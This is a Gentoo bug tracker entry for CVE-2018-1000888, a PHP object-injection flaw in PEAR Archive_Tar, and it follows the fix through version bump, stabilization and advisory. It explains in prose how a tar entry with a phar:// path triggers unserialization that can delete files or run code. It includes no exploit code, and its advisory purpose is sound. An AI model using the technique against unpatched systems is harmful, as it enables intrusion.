Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 675576 (CVE-2018-1000888)

Summary: <dev-php/PEAR-Archive_Tar-1.4.5: remote code execution vulnerability
Product: Gentoo Security Reporter: Eddie Chapman <maracay>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: major CC: php-bugs
Priority: High    
Version: unspecified   
Hardware: All   
OS: Linux   
URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000888
See Also: https://bugs.gentoo.org/show_bug.cgi?id=724520
Whiteboard: B1 [glsa+ cve]
Package list:
dev-php/PEAR-Archive_Tar-1.4.5
 Runtime testing required: ---

Description Eddie Chapman 2019-01-16 12:29:18 UTC 
From MITRE CVE entry:

"PEAR Archive_Tar version 1.4.3 and earlier contains a CWE-502, CWE-915 vulnerability in the Archive_Tar class. There are several file operations with `$v_header['filename']` as parameter (such as file_exists, is_file, is_dir, etc). When extract is called without a specific prefix path, we can trigger unserialization by crafting a tar file with `phar://[path_to_malicious_phar_file]` as path. Object injection can be used to trigger destruct in the loaded PHP classes, e.g. the Archive_Tar class itself. With Archive_Tar object injection, arbitrary file deletion can occur because `@unlink($this->_temp_tarname)` is called. If another class with useful gadget is loaded, it may possible to cause remote code execution that can result in files being deleted or possibly modified. This vulnerability appears to have been fixed in 1.4.4."

Other references:
http://blog.pear.php.net/2018/12/20/security-vulnerability-announcement-archive_tar/
http://pear.php.net/package/Archive_Tar/download/
https://pear.php.net/bugs/bug.php?id=23782

Please note the vulnerability is reported as being fixed in 1.4.4, but 1.4.4 introduced a regression so a further release (1.4.5) was made (see http://pear.php.net/bugs/bug.php?id=23788 ).

So of course the overall solution is to bump to the latest version 1.4.5.

Reproducible: Didn't try
Comment 1 Larry the Git Cow gentoo-dev 2019-01-16 14:57:16 UTC 
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=ca18a3ab3298533a4d2b035018f738f8cb4df5ad

commit ca18a3ab3298533a4d2b035018f738f8cb4df5ad
Author:     Brian Evans <grknight@gentoo.org>
AuthorDate: 2019-01-16 14:56:53 +0000
Commit:     Brian Evans <grknight@gentoo.org>
CommitDate: 2019-01-16 14:56:53 +0000

    dev-php/PEAR-Archive_Tar: Version bump for 1.4.5
    
    Bug: https://bugs.gentoo.org/675576
    Package-Manager: Portage-2.3.56, Repoman-2.3.12
    Signed-off-by: Brian Evans <grknight@gentoo.org>

 dev-php/PEAR-Archive_Tar/Manifest                  |  1 +
 .../PEAR-Archive_Tar/PEAR-Archive_Tar-1.4.5.ebuild | 31 ++++++++++++++++++++++
 2 files changed, 32 insertions(+)
Comment 2 Brian Evans (RETIRED) gentoo-dev 2019-01-16 15:00:27 UTC 
Please test and mark stable

As this is pure PHP text code, the ALLARCHES policy applies
Comment 3 Thomas Deutschmann (RETIRED) gentoo-dev 2019-01-24 22:26:31 UTC 
All arches done.
Comment 4 Larry the Git Cow gentoo-dev 2019-01-24 23:30:25 UTC 
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=5a158d06fe1dca9963ddbf792635adcbae1f6f73

commit 5a158d06fe1dca9963ddbf792635adcbae1f6f73
Author:     Brian Evans <grknight@gentoo.org>
AuthorDate: 2019-01-24 23:30:11 +0000
Commit:     Brian Evans <grknight@gentoo.org>
CommitDate: 2019-01-24 23:30:11 +0000

    dev-php/PEAR-Archive_Tar: Drop vulnerable version
    
    Bug: https://bugs.gentoo.org/675576
    Package-Manager: Portage-2.3.57, Repoman-2.3.12
    Signed-off-by: Brian Evans <grknight@gentoo.org>

 dev-php/PEAR-Archive_Tar/Manifest                  |  1 -
 .../PEAR-Archive_Tar/PEAR-Archive_Tar-1.4.3.ebuild | 31 ----------------------
 2 files changed, 32 deletions(-)
Comment 5 Yury German Gentoo Infrastructure gentoo-dev 2019-03-11 02:08:37 UTC 
Arches and Maintainer(s), Thank you for your work.
New GLSA Request filed.
Comment 6 NATTkA bot gentoo-dev Security 2020-04-06 15:16:39 UTC 
Resetting sanity check; keywords are not fully specified and arches are not CC-ed.
Comment 7 GLSAMaker/CVETool Bot gentoo-dev 2020-06-15 15:46:44 UTC 
This issue was resolved and addressed in
 GLSA 202006-14 at https://security.gentoo.org/glsa/202006-14
by GLSA coordinator Aaron Bauman (b-man).